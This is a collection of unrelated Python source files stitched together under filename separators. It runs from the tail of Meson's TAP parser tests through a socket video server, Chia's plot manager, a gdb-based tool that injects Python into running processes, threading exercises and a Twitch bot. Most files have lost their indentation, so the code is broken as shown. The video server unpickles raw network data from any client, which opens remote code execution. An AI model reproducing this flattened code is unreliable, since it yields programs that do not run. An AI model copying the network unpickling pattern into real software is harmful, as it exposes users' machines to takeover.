self.assert_last(events)
def test_one_test_late_plan(self):
events = self.parse_tap('ok\n1..1')
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_plan(events, count=1, late=True)
self.assert_last(events)
def test_out_of_order(self):
events = self.parse_tap('ok 2')
self.assert_error(events)
self.assert_test(events, number=2, name='', result=TestResult.OK)
self.assert_last(events)
def test_middle_plan(self):
events = self.parse_tap('ok 1\n1..2\nok 2')
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_plan(events, count=2, late=True)
self.assert_error(events)
self.assert_test(events, number=2, name='', result=TestResult.OK)
self.assert_last(events)
def test_too_many_plans(self):
events = self.parse_tap('1..1\n1..2\nok 1')
self.assert_plan(events, count=1, late=False)
self.assert_error(events)
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_last(events)
def test_too_many(self):
events = self.parse_tap('ok 1\nnot ok 2\n1..1')
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_test(events, number=2, name='', result=TestResult.FAIL)
self.assert_plan(events, count=1, late=True)
self.assert_error(events)
self.assert_last(events)
events = self.parse_tap('1..1\nok 1\nnot ok 2')
self.assert_plan(events, count=1, late=False)
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_test(events, number=2, name='', result=TestResult.FAIL)
self.assert_error(events)
self.assert_last(events)
def test_too_few(self):
events = self.parse_tap('ok 1\nnot ok 2\n1..3')
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_test(events, number=2, name='', result=TestResult.FAIL)
self.assert_plan(events, count=3, late=True)
self.assert_error(events)
self.assert_last(events)
events = self.parse_tap('1..3\nok 1\nnot ok 2')
self.assert_plan(events, count=3, late=False)
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_test(events, number=2, name='', result=TestResult.FAIL)
self.assert_error(events)
self.assert_last(events)
def test_too_few_bailout(self):
events = self.parse_tap('1..3\nok 1\nnot ok 2\nBail out! no third test')
self.assert_plan(events, count=3, late=False)
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_test(events, number=2, name='', result=TestResult.FAIL)
self.assert_bailout(events, message='no third test')
self.assert_last(events)
def test_diagnostics(self):
events = self.parse_tap('1..1\n# ignored\nok 1')
self.assert_plan(events, count=1, late=False)
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_last(events)
events = self.parse_tap('# ignored\n1..1\nok 1\n# ignored too')
self.assert_plan(events, count=1, late=False)
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_last(events)
events = self.parse_tap('# ignored\nok 1\n1..1\n# ignored too')
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_plan(events, count=1, late=True)
self.assert_last(events)
def test_empty_line(self):
events = self.parse_tap('1..1\n\nok 1')
self.assert_plan(events, count=1, late=False)
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_last(events)
def test_unexpected(self):
events = self.parse_tap('1..1\ninvalid\nok 1')
self.assert_plan(events, count=1, late=False)
self.assert_error(events)
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_last(events)
def test_version(self):
events = self.parse_tap('TAP version 13\n')
self.assert_version(events, version=13)
self.assert_last(events)
events = self.parse_tap('TAP version 12\n')
self.assert_error(events)
self.assert_last(events)
events = self.parse_tap('1..0\nTAP version 13\n')
self.assert_plan(events, count=0, late=False, skipped=True)
self.assert_error(events)
self.assert_last(events)
def test_yaml(self):
events = self.parse_tap_v13('ok\n ---\n foo: abc\n bar: def\n ...\nok 2')
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_test(events, number=2, name='', result=TestResult.OK)
self.assert_last(events)
events = self.parse_tap_v13('ok\n ---\n foo: abc\n bar: def')
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_error(events)
self.assert_last(events)
events = self.parse_tap_v13('ok 1\n ---\n foo: abc\n bar: def\nnot ok 2')
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_error(events)
self.assert_test(events, number=2, name='', result=TestResult.FAIL)
self.assert_last(events)
def _clang_at_least(compiler, minver: str, apple_minver: str) -> bool:
"""
check that Clang compiler is at least a specified version, whether AppleClang or regular Clang
Parameters
----------
compiler:
Meson compiler object
minver: str
Clang minimum version
apple_minver: str
        AppleClang minimum version
Returns
-------
at_least: bool
Clang is at least the specified version
"""
if isinstance(compiler, (mesonbuild.compilers.AppleClangCCompiler,
mesonbuild.compilers.AppleClangCPPCompiler)):
return version_compare(compiler.version, apple_minver)
return version_compare(compiler.version, minver)
def unset_envs():
# For unit tests we must fully control all command lines
# so that there are no unexpected changes coming from the
# environment, for example when doing a package build.
varnames = ['CPPFLAGS', 'LDFLAGS'] + list(mesonbuild.compilers.compilers.cflags_mapping.values())
for v in varnames:
if v in os.environ:
del os.environ[v]
def convert_args(argv):
# If we got passed a list of tests, pass it on
pytest_args = ['-v'] if '-v' in argv else []
test_list = []
for arg in argv:
if arg.startswith('-'):
continue
# ClassName.test_name => 'ClassName and test_name'
if '.' in arg:
arg = ' and '.join(arg.split('.'))
test_list.append(arg)
if test_list:
pytest_args += ['-k', ' or '.join(test_list)]
return pytest_args
def main():
unset_envs()
try:
import pytest # noqa: F401
# Need pytest-xdist for `-n` arg
import xdist # noqa: F401
pytest_args = ['-n', 'auto', './run_unittests.py']
pytest_args += convert_args(sys.argv[1:])
return subprocess.run(python_command + ['-m', 'pytest'] + pytest_args).returncode
except ImportError:
print('pytest-xdist not found, using unittest instead')
pass
# All attempts at locating pytest failed, fall back to plain unittest.
cases = ['InternalTests', 'DataTests', 'AllPlatformTests', 'FailureTests',
'PythonTests', 'NativeFileTests', 'RewriterTests', 'CrossFileTests',
'TAPParserTests',
'LinuxlikeTests', 'LinuxCrossArmTests', 'LinuxCrossMingwTests',
'WindowsTests', 'DarwinTests']
return unittest.main(defaultTest=cases, buffer=True)
if __name__ == '__main__':
sys.exit(main())
|
server.py
|
import socket, cv2, pickle, struct
import imutils
import threading
import pyshine as ps
server_socket = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
host_name = socket.gethostname()
host_ip = socket.gethostbyname(host_name)
print('HOST IP:',host_ip)
port = 9999
socket_address = (host_ip,port)
server_socket.bind(socket_address)
server_socket.listen()
print("Listening at",socket_address)
def show_client(addr,client_socket):
try:
print('CLIENT {} CONNECTED!'.format(addr))
if client_socket:
data = b""
payload_size = struct.calcsize("Q")
while True:
while len(data) < payload_size:
packet = client_socket.recv(4*1024)
if not packet: break
data+=packet
packed_msg_size = data[:payload_size]
data = data[payload_size:]
msg_size = struct.unpack("Q",packed_msg_size)[0]
while len(data) < msg_size:
data += client_socket.recv(4*1024)
frame_data = data[:msg_size]
data = data[msg_size:]
frame = pickle.loads(frame_data)
text = f"CLIENT: {addr}"
frame = ps.putBText(frame,text,10,10,vspace=10,hspace=1,font_scale=0.7,background_RGB=(255,0,0),text_RGB=(255,250,250))
cv2.imshow(f"FROM {addr}",frame)
key = cv2.waitKey(1) & 0xFF
if key == ord('q'):
break
client_socket.close()
except Exception as e:
print(f"CLINET {addr} DISCONNECTED")
pass
while True:
client_socket,addr = server_socket.accept()
thread = threading.Thread(target=show_client, args=(addr,client_socket))
thread.start()
print("TOTAL CLIENTS ",threading.activeCount() - 1)
|
manager.py
|
from dataclasses import dataclass
import logging
import threading
import time
import traceback
from pathlib import Path
from typing import Any, Callable, Dict, List, Optional, Set, Tuple
from concurrent.futures.thread import ThreadPoolExecutor
from blspy import G1Element
from chiapos import DiskProver
from chia.consensus.pos_quality import UI_ACTUAL_SPACE_CONSTANT_FACTOR, _expected_plot_size
from chia.plotting.util import (
PlotInfo,
PlotRefreshResult,
PlotsRefreshParameter,
PlotRefreshEvents,
get_plot_filenames,
parse_plot_info,
)
from chia.util.generator_tools import list_to_batches
from chia.util.ints import uint16
from chia.util.path import mkdir
from chia.util.streamable import Streamable, streamable
from chia.types.blockchain_format.proof_of_space import ProofOfSpace
from chia.types.blockchain_format.sized_bytes import bytes32
from chia.wallet.derive_keys import master_sk_to_local_sk
log = logging.getLogger(__name__)
CURRENT_VERSION: uint16 = uint16(0)
@dataclass(frozen=True)
@streamable
class CacheEntry(Streamable):
pool_public_key: Optional[G1Element]
pool_contract_puzzle_hash: Optional[bytes32]
plot_public_key: G1Element
@dataclass(frozen=True)
@streamable
class DiskCache(Streamable):
version: uint16
data: List[Tuple[bytes32, CacheEntry]]
class Cache:
_changed: bool
_data: Dict[bytes32, CacheEntry]
def __init__(self, path: Path):
self._changed = False
self._data = {}
self._path = path
if not path.parent.exists():
mkdir(path.parent)
def __len__(self):
return len(self._data)
def update(self, plot_id: bytes32, entry: CacheEntry):
self._data[plot_id] = entry
self._changed = True
def remove(self, cache_keys: List[bytes32]):
for key in cache_keys:
if key in self._data:
del self._data[key]
self._changed = True
def save(self):
try:
disk_cache: DiskCache = DiskCache(
CURRENT_VERSION, [(plot_id, cache_entry) for plot_id, cache_entry in self.items()]
)
serialized: bytes = bytes(disk_cache)
self._path.write_bytes(serialized)
self._changed = False
log.info(f"Saved {len(serialized)} bytes of cached data")
except Exception as e:
log.error(f"Failed to save cache: {e}, {traceback.format_exc()}")
def load(self):
try:
serialized = self._path.read_bytes()
log.info(f"Loaded {len(serialized)} bytes of cached data")
stored_cache: DiskCache = DiskCache.from_bytes(serialized)
if stored_cache.version != CURRENT_VERSION:
# TODO, Migrate or drop current cache if the version changes.
raise ValueError(f"Invalid cache version {stored_cache.version}. Expected version {CURRENT_VERSION}.")
self._data = {plot_id: cache_entry for plot_id, cache_entry in stored_cache.data}
except FileNotFoundError:
log.debug(f"Cache {self._path} not found")
except Exception as e:
log.error(f"Failed to load cache: {e}, {traceback.format_exc()}")
def keys(self):
return self._data.keys()
def items(self):
return self._data.items()
def get(self, plot_id):
return self._data.get(plot_id)
def changed(self):
return self._changed
def path(self):
return self._path
class PlotManager:
plots: Dict[Path, PlotInfo]
plot_filename_paths: Dict[str, Tuple[str, Set[str]]]
plot_filename_paths_lock: threading.Lock
failed_to_open_filenames: Dict[Path, int]
no_key_filenames: Set[Path]
farmer_public_keys: List[G1Element]
pool_public_keys: List[G1Element]
cache: Cache
match_str: Optional[str]
open_no_key_filenames: bool
last_refresh_time: float
refresh_parameter: PlotsRefreshParameter
log: Any
_lock: threading.Lock
_refresh_thread: Optional[threading.Thread]
_refreshing_enabled: bool
_refresh_callback: Callable
def __init__(
self,
root_path: Path,
refresh_callback: Callable,
match_str: Optional[str] = None,
open_no_key_filenames: bool = False,
refresh_parameter: PlotsRefreshParameter = PlotsRefreshParameter(),
):
self.root_path = root_path
self.plots = {}
self.plot_filename_paths = {}
self.plot_filename_paths_lock = threading.Lock()
self.failed_to_open_filenames = {}
self.no_key_filenames = set()
self.farmer_public_keys = []
self.pool_public_keys = []
self.cache = Cache(self.root_path.resolve() / "cache" / "plot_manager.dat")
self.match_str = match_str
self.open_no_key_filenames = open_no_key_filenames
self.last_refresh_time = 0
self.refresh_parameter = refresh_parameter
self.log = logging.getLogger(__name__)
self._lock = threading.Lock()
self._refresh_thread = None
self._refreshing_enabled = False
self._refresh_callback = refresh_callback # type: ignore
def __enter__(self):
self._lock.acquire()
def __exit__(self, exc_type, exc_value, exc_traceback):
self._lock.release()
def reset(self):
with self:
self.last_refresh_time = time.time()
self.plots.clear()
self.plot_filename_paths.clear()
self.failed_to_open_filenames.clear()
self.no_key_filenames.clear()
def set_refresh_callback(self, callback: Callable):
self._refresh_callback = callback # type: ignore
def set_public_keys(self, farmer_public_keys: List[G1Element], pool_public_keys: List[G1Element]):
self.farmer_public_keys = farmer_public_keys
self.pool_public_keys = pool_public_keys
def public_keys_available(self):
return len(self.farmer_public_keys) and len(self.pool_public_keys)
def plot_count(self):
with self:
return len(self.plots)
def get_duplicates(self):
result = []
for plot_filename, paths_entry in self.plot_filename_paths.items():
_, duplicated_paths = paths_entry
for path in duplicated_paths:
result.append(Path(path) / plot_filename)
return result
def needs_refresh(self) -> bool:
return time.time() - self.last_refresh_time > float(self.refresh_parameter.interval_seconds)
def start_refreshing(self):
self._refreshing_enabled = True
if self._refresh_thread is None or not self._refresh_thread.is_alive():
self.cache.load()
self._refresh_thread = threading.Thread(target=self._refresh_task)
self._refresh_thread.start()
def stop_refreshing(self):
self._refreshing_enabled = False
if self._refresh_thread is not None and self._refresh_thread.is_alive():
self._refresh_thread.join()
self._refresh_thread = None
def trigger_refresh(self):
log.debug("trigger_refresh")
self.last_refresh_time = 0
def _refresh_task(self):
while self._refreshing_enabled:
try:
while not self.needs_refresh() and self._refreshing_enabled:
time.sleep(1)
if not self._refreshing_enabled:
return
plot_filenames: Dict[Path, List[Path]] = get_plot_filenames(self.root_path)
plot_directories: Set[Path] = set(plot_filenames.keys())
plot_paths: List[Path] = []
for paths in plot_filenames.values():
plot_paths += paths
total_result: PlotRefreshResult = PlotRefreshResult()
total_size = len(plot_paths)
self._refresh_callback(PlotRefreshEvents.started, PlotRefreshResult(remaining=total_size))
                # First drop all plots that are in plot_filename_paths but no longer in the filesystem or configured directories
for path in list(self.failed_to_open_filenames.keys()):
if path not in plot_paths:
del self.failed_to_open_filenames[path]
for path in self.no_key_filenames.copy():
if path not in plot_paths:
self.no_key_filenames.remove(path)
with self:
filenames_to_remove: List[str] = []
for plot_filename, paths_entry in self.plot_filename_paths.items():
loaded_path, duplicated_paths = paths_entry
loaded_plot = Path(loaded_path) / Path(plot_filename)
if loaded_plot not in plot_paths:
filenames_to_remove.append(plot_filename)
if loaded_plot in self.plots:
del self.plots[loaded_plot]
total_result.removed.append(loaded_plot)
# No need to check the duplicates here since we drop the whole entry
continue
paths_to_remove: List[str] = []
for path in duplicated_paths:
loaded_plot = Path(path) / Path(plot_filename)
if loaded_plot not in plot_paths:
paths_to_remove.append(path)
total_result.removed.append(loaded_plot)
for path in paths_to_remove:
duplicated_paths.remove(path)
for filename in filenames_to_remove:
del self.plot_filename_paths[filename]
for remaining, batch in list_to_batches(plot_paths, self.refresh_parameter.batch_size):
batch_result: PlotRefreshResult = self.refresh_batch(batch, plot_directories)
if not self._refreshing_enabled:
self.log.debug("refresh_plots: Aborted")
break
# Set the remaining files since `refresh_batch()` doesn't know them but we want to report it
batch_result.remaining = remaining
total_result.loaded += batch_result.loaded
total_result.processed += batch_result.processed
total_result.duration += batch_result.duration
self._refresh_callback(PlotRefreshEvents.batch_processed, batch_result)
if remaining == 0:
break
batch_sleep = self.refresh_parameter.batch_sleep_milliseconds
self.log.debug(f"refresh_plots: Sleep {batch_sleep} milliseconds")
time.sleep(float(batch_sleep) / 1000.0)
if self._refreshing_enabled:
self._refresh_callback(PlotRefreshEvents.done, total_result)
# Cleanup unused cache
available_ids = set([plot_info.prover.get_id() for plot_info in self.plots.values()])
invalid_cache_keys = [plot_id for plot_id in self.cache.keys() if plot_id not in available_ids]
self.cache.remove(invalid_cache_keys)
self.log.debug(f"_refresh_task: cached entries removed: {len(invalid_cache_keys)}")
if self.cache.changed():
self.cache.save()
self.last_refresh_time = time.time()
self.log.debug(
f"_refresh_task: total_result.loaded {len(total_result.loaded)}, "
f"total_result.removed {len(total_result.removed)}, "
f"total_duration {total_result.duration:.2f} seconds"
)
except Exception as e:
log.error(f"_refresh_callback raised: {e} with the traceback: {traceback.format_exc()}")
self.reset()
def refresh_batch(self, plot_paths: List[Path], plot_directories: Set[Path]) -> PlotRefreshResult:
start_time: float = time.time()
result: PlotRefreshResult = PlotRefreshResult(processed=len(plot_paths))
counter_lock = threading.Lock()
log.debug(f"refresh_batch: {len(plot_paths)} files in directories {plot_directories}")
if self.match_str is not None:
log.info(f'Only loading plots that contain "{self.match_str}" in the file or directory name')
def process_file(file_path: Path) -> Optional[PlotInfo]:
if not self._refreshing_enabled:
return None
filename_str = str(file_path)
if self.match_str is not None and self.match_str not in filename_str:
return None
if (
file_path in self.failed_to_open_filenames
and (time.time() - self.failed_to_open_filenames[file_path])
< self.refresh_parameter.retry_invalid_seconds
):
# Try once every `refresh_parameter.retry_invalid_seconds` seconds to open the file
return None
if file_path in self.plots:
return self.plots[file_path]
entry: Optional[Tuple[str, Set[str]]] = self.plot_filename_paths.get(file_path.name)
if entry is not None:
loaded_parent, duplicates = entry
if str(file_path.parent) in duplicates:
log.debug(f"Skip duplicated plot {str(file_path)}")
return None
try:
if not file_path.exists():
return None
prover = DiskProver(str(file_path))
log.debug(f"process_file {str(file_path)}")
expected_size = _expected_plot_size(prover.get_size()) * UI_ACTUAL_SPACE_CONSTANT_FACTOR
stat_info = file_path.stat()
# TODO: consider checking if the file was just written to (which would mean that the file is still
# being copied). A segfault might happen in this edge case.
if prover.get_size() >= 30 and stat_info.st_size < 0.98 * expected_size:
log.warning(
f"Not farming plot {file_path}. Size is {stat_info.st_size / (1024**3)} GiB, but expected"
f" at least: {expected_size / (1024 ** 3)} GiB. We assume the file is being copied."
)
return None
cache_entry = self.cache.get(prover.get_id())
if cache_entry is None:
(
pool_public_key_or_puzzle_hash,
farmer_public_key,
local_master_sk,
) = parse_plot_info(prover.get_memo())
                    # Only use plots that have the correct keys associated with them
if farmer_public_key not in self.farmer_public_keys:
log.warning(f"Plot {file_path} has a farmer public key that is not in the farmer's pk list.")
self.no_key_filenames.add(file_path)
if not self.open_no_key_filenames:
return None
pool_public_key: Optional[G1Element] = None
pool_contract_puzzle_hash: Optional[bytes32] = None
if isinstance(pool_public_key_or_puzzle_hash, G1Element):
pool_public_key = pool_public_key_or_puzzle_hash
else:
assert isinstance(pool_public_key_or_puzzle_hash, bytes32)
pool_contract_puzzle_hash = pool_public_key_or_puzzle_hash
if pool_public_key is not None and pool_public_key not in self.pool_public_keys:
log.warning(f"Plot {file_path} has a pool public key that is not in the farmer's pool pk list.")
self.no_key_filenames.add(file_path)
if not self.open_no_key_filenames:
return None
# If a plot is in `no_key_filenames` the keys were missing in earlier refresh cycles. We can remove
                    # the current plot from that list if it's in there since we passed the key checks above.
if file_path in self.no_key_filenames:
self.no_key_filenames.remove(file_path)
local_sk = master_sk_to_local_sk(local_master_sk)
plot_public_key: G1Element = ProofOfSpace.generate_plot_public_key(
local_sk.get_g1(), farmer_public_key, pool_contract_puzzle_hash is not None
)
cache_entry = CacheEntry(pool_public_key, pool_contract_puzzle_hash, plot_public_key)
self.cache.update(prover.get_id(), cache_entry)
with self.plot_filename_paths_lock:
paths: Optional[Tuple[str, Set[str]]] = self.plot_filename_paths.get(file_path.name)
if paths is None:
paths = (str(Path(prover.get_filename()).parent), set())
self.plot_filename_paths[file_path.name] = paths
else:
paths[1].add(str(Path(prover.get_filename()).parent))
log.warning(f"Have multiple copies of the plot {file_path.name} in {[paths[0], *paths[1]]}.")
return None
new_plot_info: PlotInfo = PlotInfo(
prover,
cache_entry.pool_public_key,
cache_entry.pool_contract_puzzle_hash,
cache_entry.plot_public_key,
stat_info.st_size,
stat_info.st_mtime,
)
with counter_lock:
result.loaded.append(new_plot_info)
if file_path in self.failed_to_open_filenames:
del self.failed_to_open_filenames[file_path]
except Exception as e:
tb = traceback.format_exc()
log.error(f"Failed to open file {file_path}. {e} {tb}")
self.failed_to_open_filenames[file_path] = int(time.time())
return None
log.info(f"Found plot {file_path} of size {new_plot_info.prover.get_size()}")
return new_plot_info
with self, ThreadPoolExecutor() as executor:
plots_refreshed: Dict[Path, PlotInfo] = {}
for new_plot in executor.map(process_file, plot_paths):
if new_plot is not None:
plots_refreshed[Path(new_plot.prover.get_filename())] = new_plot
self.plots.update(plots_refreshed)
result.duration = time.time() - start_time
self.log.debug(
f"refresh_batch: loaded {len(result.loaded)}, "
f"removed {len(result.removed)}, processed {result.processed}, "
f"remaining {result.remaining}, batch_size {self.refresh_parameter.batch_size}, "
f"duration: {result.duration:.2f} seconds"
)
return result
|
cli.py
|
from __future__ import absolute_import
import contextlib
import os
import subprocess
import tempfile
import threading
import time
from typing import Callable, Iterator, Optional
import click
import jinja2
import shamiko
from shamiko import proc_utils, session_utils
from shamiko.gdb_rpc import (
FrameWrapper,
GdbWrapper,
InferiorWrapper,
ThreadWrapper,
)
from shamiko.session import Session
@click.group()
@click.argument("pid", type=int, required=True)
@click.option("--executable", "-e", type=str, default=None)
@click.option("--context", "-c", type=str, default=None)
@click.pass_context
def cli(ctx, pid, executable, context):
# type: (click.Context, int, Optional[str], Optional[str]) -> None
if not proc_utils.pid_exists(pid):
click.echo("Pid={} doesn't exists.".format(pid))
ctx.obj = {}
ctx.obj["pid"] = pid
ctx.obj["executable"] = executable
ctx.obj["context"] = context
@contextlib.contextmanager
def _get_session(ctx):
# type: (click.Context) -> Iterator[Session]
with session_utils.create_session(
ctx.obj["pid"], ctx.obj["executable"], ctx.obj["context"]
) as session:
yield session
@contextlib.contextmanager
def _get_inferior(ctx):
# type: (click.Context) -> Iterator[InferiorWrapper]
with _get_session(ctx) as s:
inferior = s.session.get_inferior()[0]
yield inferior
def _run(
ctx, # type: click.Context
func, # type: Callable[[FrameWrapper], bool]
thread, # type: Optional[int]
frame, # type: Optional[int]
):
# type: (...) -> bool
with _get_inferior(ctx) as inferior:
return session_utils.traverse_frame(inferior, func, thread, frame)
def _print_result_message(result):
# type: (bool) -> None
if result:
click.echo("Ran successfully")
else:
click.echo(
"Traversed all matched frames, but couldn't run successfully"
)
click.echo("HINT: Try without --thread or --frame option")
@cli.command(help="inspect the running process")
@click.pass_context
def inspect(ctx):
# type: (click.Context) -> None
def visit_thread(thread):
# type: (ThreadWrapper) -> bool
args = {
"num": thread.num,
"global_num": thread.global_num,
"ptid": thread.ptid,
"name": thread.name,
"is_running": thread.is_running,
"is_exited": thread.is_exited,
"is_stopped": thread.is_stopped,
}
fmt = """=== Frame [num={num}] ===
- name: {name}
- ptid: {ptid}
- global_num: {global_num}
- is_running: {is_running}
- is_exited: {is_exited}
- is_stopped: {is_stopped}
- available python frames"""
click.echo(fmt.format(**args))
return True
def visit_frame(frame):
# type: (FrameWrapper) -> bool
description = "(Unknown Frame)"
if frame.is_evalframe:
description = "(unable to read python frame information)"
try:
filename = frame.filename
line_num = frame.current_line_num
description = "File={}:{}".format(filename, line_num)
except Exception:
pass # NOQA
else:
info = frame.is_other_python_frame
if info:
description = info
fmt = " * Frame #{}: {}".format(frame.get_index(), description)
click.echo(fmt)
return True
with _get_inferior(ctx) as inferior:
session_utils.visit(
inferior, visit_thread, visit_frame, lambda _: False
)
@cli.command(help="inject a python script file into the running process")
@click.argument("file_path", type=click.Path(exists=True))
@click.option("--thread", type=int, default=None)
@click.option("--frame", type=int, default=None)
@click.pass_context
def run_file(ctx, file_path, thread, frame):
# type: (click.Context, str, Optional[int], Optional[int]) -> None
def impl(frame):
# type: (FrameWrapper) -> bool
try:
frame.run_file(file_path)
except Exception:
return False
return True
_print_result_message(_run(ctx, impl, thread, frame))
@cli.command(help="inject a python code into the running process")
@click.argument("script", type=str)
@click.option("--thread", type=int, default=None)
@click.option("--frame", type=int, default=None)
@click.pass_context
def run_script(ctx, script, thread, frame):
# type: (click.Context, str, Optional[int], Optional[int]) -> None
def impl(frame):
# type: (FrameWrapper) -> bool
try:
frame.run_simple_string(script)
except Exception:
return False
return True
_print_result_message(_run(ctx, impl, thread, frame))
AVAILABLE_DEBUGGERS = [
"pdb",
]
@cli.command(help="attach a debugger to the running process")
@click.option("--thread", type=int, default=None)
@click.option("--frame", type=int, default=None)
@click.option(
"--debugger", type=click.Choice(AVAILABLE_DEBUGGERS), default=None
)
@click.pass_context
def attach(ctx, thread, frame, debugger):
# type: (click.Context, Optional[int], Optional[int], Optional[str]) -> None
debugger = debugger or "pdb"
assert debugger in AVAILABLE_DEBUGGERS
template_name = "attach_{}.py.template".format(debugger)
template_dir = shamiko._get_template_dir()
env = jinja2.Environment(
autoescape=False, loader=jinja2.FileSystemLoader(template_dir)
)
template = env.get_template(template_name)
disposed = threading.Event()
with tempfile.TemporaryDirectory(prefix="shamiko_dbg_") as session_root:
socket_path = os.path.join(session_root, "proc.sock")
script_path = os.path.join(session_root, "script.py")
script = template.render(unix_socket_path=socket_path)
with open(script_path, "w") as f:
f.write(script)
def connect_stream():
# type: () -> None
dt = 0.1
wait_sec = 100.0
max_counter = int(wait_sec / dt)
for i in range(max_counter):
if os.path.exists(socket_path) or disposed.is_set():
break
if i % 10 == 0:
click.echo("waiting for the session to get ready...")
time.sleep(dt)
else:
raise RuntimeError("couldn't open socket. something went wrong")
if disposed.is_set():
return
process = subprocess.Popen(["nc", "-U", socket_path],)
click.echo("session opened")
while True:
if process.poll() is not None:
return
time.sleep(dt)
def impl(frame):
# type: (FrameWrapper) -> bool
try:
frame.run_file(script_path)
except Exception:
return False
return True
t = threading.Thread(target=connect_stream)
t.start()
try:
ret = _run(ctx, impl, thread, frame)
if not ret:
                # show the message only when traversing failed
_print_result_message(ret)
finally:
disposed.set()
t.join()
def _launch_ipshell(pid, session):
# type: (int, GdbWrapper) -> None
from IPython.terminal.embed import InteractiveShellEmbed
from IPython.config.loader import Config
banner = """
=== SHAMIKO SHELL ===
Opened a session to pid={}. You can access it from the variable `session`.
=====================
""".format(
pid
)
ipshell = InteractiveShellEmbed(
config=Config(), banner1=banner, exit_msg="Bye."
)
ipshell()
@cli.command(help="launch an interactive shell")
@click.pass_context
def shell(ctx):
# type: (click.Context) -> None
with _get_session(ctx) as session:
_launch_ipshell(ctx.obj["pid"], session.session)
if __name__ == "__main__":
cli()
|
el_cruce_rio.py
|
from threading import Semaphore,Thread
from time import sleep
import random
hackers=0
serfs=0
lista_hackeres=Semaphore(0)
lista_serfs=Semaphore(0)
total=4
mutex_balsa=Semaphore(1)
def hacker(num):
    global hackers,serfs
    #print("hacker %d waiting ..." % num)
    mutex_balsa.acquire()
    hackers+=1
    print("hacker %d boarding the raft" % num)
    if hackers == 4:
        for i in range(total):
            lista_hackeres.release()
        hackers=0
        print("*** The raft is setting off")
    elif serfs >= 2 and hackers==2:
        for i in range(2):
            lista_hackeres.release()
            lista_serfs.release()
        serfs-=2
        hackers=0
        print("*** The raft is setting off")
    mutex_balsa.release()
    lista_hackeres.acquire()
def serf(num):
    global hackers,serfs
    #print("serf %d waiting ..." % num)
    mutex_balsa.acquire()
    print("serf %d boarding the raft" % num)
    serfs+=1
    if serfs == 4:
        for i in range(total):
            lista_serfs.release()
        serfs=0
        print("*** The raft is setting off")
    elif hackers >= 2 and serfs==2:
        for i in range(2):
            lista_serfs.release()
            lista_hackeres.release()
        hackers-=2
        serfs=0
        print("*** The raft is setting off")
    mutex_balsa.release()
    lista_serfs.acquire()
for i in range(12):
Thread(target=hacker, args=[i]).start()
for i in range(16):
Thread(target=serf, args=[i]).start()
|
3.event.py
|
'''
Note: used for inter-thread communication; after one thread finishes its work, it notifies the other threads.
'''
from threading import Event, Thread
def work(event: Event):
    print('Worker: work finished')
event.set()
def boss(event: Event):
    print('Boss: assigning work')
w = Thread(target=work, args=(event,))
w.start()
event.wait()
    print('Boss: good job')
def main():
event = Event()
b = Thread(target=boss, args=(event,))
b.start()
if __name__ == '__main__':
main()
|
main.py
|
"""
Run this file to open the bot.
Change the contents of if __name__ == '__main__'
to change bot behaviour for testing purposes. For example,
you may call test_beeps_and_browser() to see how loud the notification is.
Change the contents of properties.yml to
change the runtime behaviour of the bot.
This script is licensed by the MIT License.
See LICENSE for more information.
"""
import yaml
import pathlib
import socket
import logging
import webbrowser
from playsound import playsound
import datetime
import threading as th
logging.basicConfig(level=logging.DEBUG)
def load_properties() -> dict:
# Project root directory
root = ROOT
    prop_path = pathlib.Path(root) / 'properties.yml'
    with open(prop_path, 'r') as f:
        data = yaml.safe_load(f)
    logging.info('Loaded ' + str(prop_path))
    logging.info('Found the following keywords: ')
    keywords = '\n - '.join(
        f'({", ".join(kw for kw in kw_set["required"].split())}) opens {kw_set["open"]}'
        for kw_set in data['keywords'])
    logging.info(keywords)
    return data
def test_beeps_and_browser():
webbrowser.open('https://google.ca')
playsound(ROOT + '\\' + PROPERTIES['notify']['sound'])
def alert(kw_set: dict[str, str]):
webbrowser.open(kw_set['open'])
playsound(ROOT + '\\' + PROPERTIES['notify']['sound'])
KEEP_RUNNING = True
def keyboard_thread_init():
thread = th.Thread(target=keyboard_thread, args=())
thread.start()
def keyboard_thread():
global KEEP_RUNNING
while True:
        x = input('To escape back to the main screen, enter "q": \n')
if x == 'q':
KEEP_RUNNING = False
return
def run_bot():
# Create new thread for keyboard
keyboard_thread_init()
while KEEP_RUNNING:
resp = SOCK.recv(2048).decode('utf-8')
if len(resp) == 0:
# Ignore message
pass
        # Twitch sends a PING roughly every 5 minutes, and the bot
        # must answer it with a PONG to keep the connection alive
elif resp.startswith('PING'):
SOCK.send("PONG\n".encode('utf-8'))
else:
for kw_set in PROPERTIES['keywords']:
keywords_match = all(req in resp
for req in kw_set['required'].split())
if keywords_match:
alert(kw_set)
log_text = datetime.datetime.now().strftime('%H:%M:%S ') + resp
logging.info(log_text)
def interface():
"""The main UI for accessing tests and bot functionality from command line"""
global KEEP_RUNNING
while True:
x = input('Enter "test" to test sounds or "run" to run the bot: ')
if x == 'test':
test_beeps_and_browser()
elif x == 'run':
logging.info('Press "q" to return back to this menu.')
KEEP_RUNNING = True
run_bot()
elif x == 'q':
logging.info('Aborting the script...')
return
# Load Properties
ROOT = str(pathlib.Path(__file__).parent.absolute())
PROPERTIES = load_properties()
# Connect to socket
SOCK = socket.socket()
SOCK.connect((PROPERTIES['socket']['url'], PROPERTIES['socket']['port']))
# Send information on where to connect
SOCK.send(f"PASS {PROPERTIES['login']['token']}\n".encode('utf-8'))
SOCK.send(f"NICK {PROPERTIES['login']['nickname']}\n".encode('utf-8'))
SOCK.send(f"JOIN {PROPERTIES['login']['channel']}\n".encode('utf-8'))
if __name__ == '__main__':
    interface()
|
nrf24_manager.py
|
#! venv/bin/python
import yaml
import paho.mqtt.client as mqtt
import logging
import sys
import time
import threading
